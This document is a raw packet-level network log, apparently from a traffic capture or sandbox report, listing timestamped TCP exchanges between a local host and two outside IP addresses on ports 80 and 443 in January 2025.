                                                                                                Jan 16, 2025 08:30:40.022171974 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.022183895 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.022197008 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.022202015 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.022208929 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.022219896 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.022234917 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.022270918 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.022993088 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.023108006 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.088738918 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088758945 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088772058 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088783026 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088795900 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088805914 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088816881 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088823080 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.088828087 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088839054 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088851929 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.088887930 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.088902950 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.090012074 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.090023041 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.090034008 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.090045929 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.090081930 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.090111971 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.108114004 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108125925 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108138084 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108221054 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.108264923 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108282089 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108300924 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108309031 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.108313084 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108324051 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108334064 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108339071 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.108351946 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108362913 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108374119 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108376026 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.108383894 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.108395100 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.108437061 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109004974 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109014988 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109025955 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109036922 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109102964 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109102964 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109286070 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109302998 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109314919 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109325886 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109338045 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109349966 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109373093 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109679937 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109690905 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109702110 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109726906 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109743118 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109754086 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109771013 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109781981 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109792948 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109793901 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109806061 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109816074 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109821081 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109827995 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.109848022 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.109865904 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.110666037 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.110677958 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.110688925 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.110698938 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.110709906 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.110719919 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.110721111 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.110733032 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.110743999 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.110763073 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.110780001 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.170214891 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170237064 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170249939 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170262098 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170305014 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.170341969 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170350075 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.170353889 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170365095 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170376062 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170387030 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170392990 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.170430899 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.170595884 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170607090 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170619011 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170629025 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170639992 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.170649052 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.170701027 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.176933050 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.176945925 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.176955938 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.176986933 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177004099 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177015066 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.177016020 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177026987 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177038908 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177052021 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.177089930 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.177331924 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177342892 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177355051 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177366018 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177385092 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.177408934 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.177541018 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177553892 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177565098 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177575111 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177587032 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177862883 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.177925110 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177937031 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177947998 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177958012 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177968979 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177979946 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.177980900 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.177990913 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.178000927 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.178005934 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.178011894 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.178037882 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.178066969 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.196672916 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.196711063 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.196722984 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.196733952 CET804970587.120.113.91192.168.2.5
                                                                                                Jan 16, 2025 08:30:40.196774006 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.196791887 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:40.869833946 CET4970580192.168.2.587.120.113.91
                                                                                                Jan 16, 2025 08:30:41.056646109 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:41.056684017 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:41.056757927 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:41.094556093 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:41.094640017 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.401901007 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.401992083 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:42.406224966 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:42.406240940 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.406502962 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.451952934 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:42.457621098 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:42.499334097 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.777332067 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.777362108 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.777369022 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.777446032 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:42.777479887 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:42.826972008 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.000571966 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.000627995 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.000648022 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.000682116 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.000720978 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.000832081 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.000849962 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.000881910 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.000885010 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.000911951 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.000927925 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.002023935 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.002043962 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.002093077 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.002389908 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.002408028 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.002449036 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.002487898 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.224284887 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.224302053 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.224384069 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.224694967 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.224776983 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.225596905 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.225658894 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.225661039 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.225672960 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.225713015 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.226583004 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.226646900 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.227478981 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.227555037 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.227555037 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.227571964 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.227612972 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.447577000 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.447588921 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.447658062 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.447699070 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.447758913 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.447812080 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.447869062 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.448033094 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.448087931 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.448251963 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.448313951 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.448436975 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.448492050 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.448702097 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.448755026 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.452589035 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.452678919 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.452691078 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.452698946 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.452735901 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.452888966 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.452950954 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.452955961 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.453005075 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.453458071 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.453496933 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.453531981 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.453537941 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.453557968 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.453572035 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.534550905 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.534653902 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.534693956 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.534759045 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.671268940 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.671390057 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.671411991 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.671451092 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.671468973 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.671492100 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.671621084 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.671678066 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.671993017 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.672055960 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.672079086 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.672091007 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.672106981 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.672126055 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.672199965 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.672255993 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.672388077 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.672450066 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.672492981 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.672559023 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.672662020 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.672717094 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.672821045 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.672882080 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.673039913 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.673093081 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.673238993 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.673310041 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.673320055 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.673372030 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.673578024 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.673635960 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.673645020 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.673654079 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.673683882 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.673697948 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.673892975 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.673954010 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.758415937 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.758547068 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.758590937 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.758693933 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.758702993 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.758760929 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.758780956 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.758861065 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.758867979 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.758882046 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.758938074 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.758955002 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.759052038 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.759115934 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.759253979 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.759332895 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.759417057 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.759486914 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.759504080 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.759593010 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.759646893 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.759711981 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.759762049 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.759845972 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.759954929 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.760016918 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.760068893 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.760134935 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.760451078 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.760586023 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.894675016 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.894768000 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.894848108 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.894921064 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.894957066 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.895020962 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.895303011 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.895373106 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.895482063 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.895545006 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.895606041 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.895673990 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.895715952 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.895787001 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.895817995 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.895905018 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.895941019 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.896004915 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.896162033 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.896234035 CET49706443192.168.2.5166.62.28.147
                                                                                                Jan 16, 2025 08:30:43.896280050 CET44349706166.62.28.147192.168.2.5
                                                                                                Jan 16, 2025 08:30:43.896343946 CET49706443192.168.2.5166.62.28.147
